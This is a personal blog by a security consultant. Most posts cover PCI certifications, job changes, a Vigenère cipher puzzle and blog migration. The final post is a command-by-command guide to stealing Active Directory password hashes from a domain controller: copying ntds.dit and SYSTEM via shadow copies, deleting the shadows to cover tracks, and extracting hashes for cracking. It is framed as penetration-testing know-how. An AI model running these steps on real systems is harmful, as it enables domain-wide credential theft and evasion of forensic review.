Thursday, June 22, 2017

PCI PA/P2PE certifications

Took the Payment Application (PA) Qualified Security Assessor (QSA) exam back in March, just a couple of weeks after taking the Point to Point Encryption (P2PE) QSA exam. Surprisingly they both seemed fairly easy tests, the P2PE was a little harder since I had to study up on some crypto information.

Had been trying for a few months to assist with some P2PE assessment work, but it seems that is not as easy as I had hoped. Had asked to shadow some people or assist on small projects, but got nothing. I then asked to work on PA assessment, was invited out to the Colorado office to learn the internal processes, and go over some documents. Was asked if I was interested in joining the PA team by hte managing principal.

Finally decided to stop trying to get into the P2PE team, and took an opportunity on the PA team. Applied for a Senior Consultant position, but was only transferred over as a IT security Consultant. Not exactly sure what the deal is with promoting me to Senior, especially since I have more experience then most Senior Consultants that I have worked with so far. But that battle is for another day.

Will see how things go with doing the PA assessments, they do not seem to be very difficult, most of the testing is easy. The pentesting portion is kind of a joke, as they do only minor tests against SQLi, XSS, CSRF and buffer overflows. Almost makes me miss doing the pentesting stuff, and the exploiting software vulnerabilities.



Wednesday, January 4, 2017

Starting off 2017 right! (I hope.....)

Well its 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling about every week and multiple ROC's due weekly for my previous company. Never had enough time to actually do my job well or even think about fixing the issues that we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss, hope that changes a little starting soon. Working from home is a little weird, not sure it is something I really like, miss the interactions with other people. Not that I do not like my family, its just getting out of the house for a little while and talking to other people with similar interests. Will be trying to get former colleagues to do lunch once in a while to at least try to keep up with whats going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. First one is an ISO 27001 Lead Auditor certification course. I will be heading to Colorado for a few days. The class was supposed to be for junior associates that needed a certification to allow them to get their QSA. I asked if their was space I would like to attend, and I guess there was room for me. The second class is PCI P2PE certification, which will be a little harder from my perspective. Most of my cryptography experience is military related and not really geared towards the commercial sector. If I pass this course, I have been asked if I wanted to take the PA-DSS course and then possibly the PA-P2PE course. Since they are in need of people to assist in that area, I said why not. I am always willing to take training classes, certifications never hurt anyone.

So it looks like my first full ROC I am lead on will be a client that they have had for a while. This should be fairly nice to get to learn their methodology, and show my manager, I am able to do the work. I was brought in as a consultant, and not a senior consultant. That was something I had decided to do, I originally had interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower level position. I am sure some are going WTF, I would never do that. Well, I am more than capable to be a senior consultant, but If I come in as a junior level person and can show that I am very good at my job, I will more than likely get a promotion or possibly opportunities to do other stuff. Which is sort of what is happening already with the certification courses.

Well 2017, lets hope things keep rolling along smoothly.....   

Friday, December 2, 2016

ARCYBER Puzzle

Had a former colleague post a cipher puzzle on a Slack channel I hang out on.

http://www.recruitahacker.net/Puzzle

I figured I would give it a try, since I like to do puzzles.
The site was a link to an ARCYBER web site:


Looking at the cipher text, I was like you have to be kidding me. This is too easy, so I ran it through a script I made a few years back to break vigenère ciphers for another puzzle I had worked.

While the script is not perfect, it was able to decode this cipher text.

Eexl fmoi! 
Well done!

Jabnh gsl'ze decbjrx lvtv, gsl uak hctf xyw gvltpj 
Since you're reading this, you may have the skills

inp mqrjzrlwzq bs awiz tjc Bvdq hpdu! 
and motivation to join the Army team

Pvirz mqpf esgie bwyi xofeprjec xiexzi nqtt ATAZFVJ.
Learn more about your potential future with ARCYBER.

KEY:
iamacybersoldier

So putting the key into the website you get the full response.


You got a link to email someone that you solved the puzzle.



So I was like sure, what could it hurt, might get an offer to apply for some cool jobs with the government (not really).

The response from my email to solving the puzzle.

Congratulations on solving the puzzle and for your interest in the Army's cyber mission. We ask that you fill out a form found at http://www.goarmy.com/info/send1/?iom=GT45-FY16-ACNP-OT-XXX-XX-XXX-CP-XX-X-XXX   so we can continue discussions about how you can best fit into our Army's cyber professional workforce. We thank you for your inquiry and are committed to providing information as it becomes available. You may check out our website for the latest cyber career field updates at www.arcyber.army.mil.


v/r,
Mike Milord

Public Affairs Specialist
Army Cyber Command
8605 6th Armored Cavalry Road
Fort Meade, MD 20755
301-833-2007
michael.o.milord.civ@mail.mil

It takes to the Army website to request information to join.
I figure since I already have 24 years of service in the military they will not want me.

Tuesday, November 22, 2016

Moving from WordPress to Blogger Hassles

Have been attempting to move from WordPress to Blogger, and failing miserably at it.

There seems to be no useful tools still available that will parse the WordPress export to a usable file to import to Blogger. At one time there was several tools, and many sites to assist with this. I guess that has gone and many are no longer available or working.

Downloaded several scripts that say they work on converting the data to the correct format, all have failed me. Tried some websites, and they all barf on me that my file is either incorrect format or is too large.

Currently have moved one article over, with many format changes needed, it took me about an hour to get it in a readable format.

Attempting to move articles over one at a time is a time consuming, guess I will only move the important ones over and trash the others.


Monday, September 26, 2016

Starting a new Job

I have Left Sword & Shield to take a better opportunity with Coalfire Systems.
There were multiple reasons for leaving Sword & Shield, and most of them are related to one individual that has moved up the ranks in the company. He was originally hired to do report reviews five years back, and is now the Senior VP of services. Since his move into management there has been a drastic exodus of highly qualified personnel from the company. One major issue is that the CEO/President, Executive VP and COO do not even notice the main reason for the high personnel turnover.
Since I turned in my notice, the CEO and COO have completely ignored me. Walking down the hallway, I always say hello to everyone, and usually get a hello back from whomever is there. Not lately; had multiple encounters with the C suite and they literally walk past me as if I was not there.
I wish all my former colleagues well in there endeavors and hope things get better.

Thursday, December 24, 2015

Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I have been currently splitting my time between doing penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customers doing PCI work. Usually never works out in my favor, and makes for working long hours, with no compensation for it.
My bosses boss (our COO) said that on Jan 1 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill me on the team, but another person left in November leaving another shortage. The interesting thing is this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Friday, August 14, 2015

Getting Hashes From NTDS.dit File - Updated Version

Moved from my old Wordpress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.
Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:\vssadmin list shadows
Example: 'vssadmin list shadows' no Shadows Available
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:\vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:\'
 Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
 Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOWYCOPY DISK>\windows\<directory>\<File> <where to put file>

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLM\SYSTEM c:\SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
 vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
 • libesedb
 • ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
 [ -T table_name ] [ -hvV ] source 

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
 windows-932, windows-936, windows-1250, windows-1251,
 windows-1252 (default), windows-1253, windows-1254
 windows-1255, windows-1256, windows-1257 or windows-1258
 -h: shows this help
 -l: logs information about the exported items
 -m: export mode, option: all, tables (default)
 'all' exports all the tables or a single specified table with indexes,
 'tables' exports all the tables or a single specified table
 -t: specify the basename of the target directory to export to
 (default is the source filename) esedbexport will add the suffix
 .export to the basename
 -T: exports only a specific table
 -v: verbose output to stderr
 -V: print version
 Runing esedbexport to extract ntds.dit data:
 ./esedbexport -t <Directory to export data to> <ntds.dit file>
.export will be added to the end of the directory listed above

EXAMPLE:
 # ./esedbexport -t ~/ntds ~/ntds.dit
 esedbexport 20150409

Opening file.
 Exporting table 1 (MSysObjects) out of 11.
 Exporting table 2 (MSysObjectsShadow) out of 11.
 Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
 Exporting table 4 (datatable) out of 11.
 Exporting table 5 (link_table) out of 11.
 Exporting table 6 (hiddentable) out of 11.
 Exporting table 7 (sdproptable) out of 11.
 Exporting table 8 (sd_table) out of 11.
 Exporting table 9 (quota_table) out of 11.
 Exporting table 10 (quota_rebuild_progress_table) out of 11.
 Exporting table 11 (MSysDefrag1) out of 11.
 Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:
# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10
NTDSXtract:
http://www.ntdsxtract.com/
CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsuser.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
--sid <user sid>
List user identified by SID
--guid <user guid>
List user identified by GUID
--name <user name regexp>
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
--debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>
(Add --passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)
Example Output in JTR Format:
 # python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP \
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

 [+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
 [+] Started with options:
 [-] Extracting password hashes
 [-] LM hash output filename: LM.out
 [-] NT hash output filename: NT.out
 [-] Hash output format: john The directory (/root/TEMP) specified does not exists!
 Would you like to create it? [Y/N] y
 [+] Initialising engine...
 [+] Loading saved map files (Stage 1)...
 [!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map' [+] Rebuilding maps...
 [+] Scanning database - 100% -> 40933 records processed
 [+] Sanity checks...
 Schema record id: 1481
 Schema type id: 10
 [+] Extracting schema information - 100% -> 4142 records processed
 [+] Loading saved map files (Stage 2)...
 [!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
 [+] Rebuilding maps...
 [+] Extracting object links...
 List of users:
 ==============
 (This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
 User name: FName LName
 User principal name: email@address.net
 SAM Account name: name
 SAM Account type: SAM_NORMAL_USER_ACCOUNT
 GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
 SID: S-1-5-21-350701555-3721294507-2303513147-3801
 When created: 2005-06-01 13:50:37
 When changed: 2013-12-12 15:08:12
 Account expires: Never
 Password last set: 2013-10-07 13:20:19.146593
 Last logon: 2013-12-11 18:35:10.166785
 Last logon timestamp: 2013-12-12 15:08:12.281517
 Bad password time 2013-12-11 00:04:52.446209
 Logon count: 6239
 Bad password count: 0
 User Account Control:
 NORMAL_ACCOUNT
 Ancestors:
 $ROOT_OBJECT$ local DOMAIN JOB Users FName LName
 Password hashes:
 name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
 name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need.... it is time to start cracking passwords to get to that data you wanted…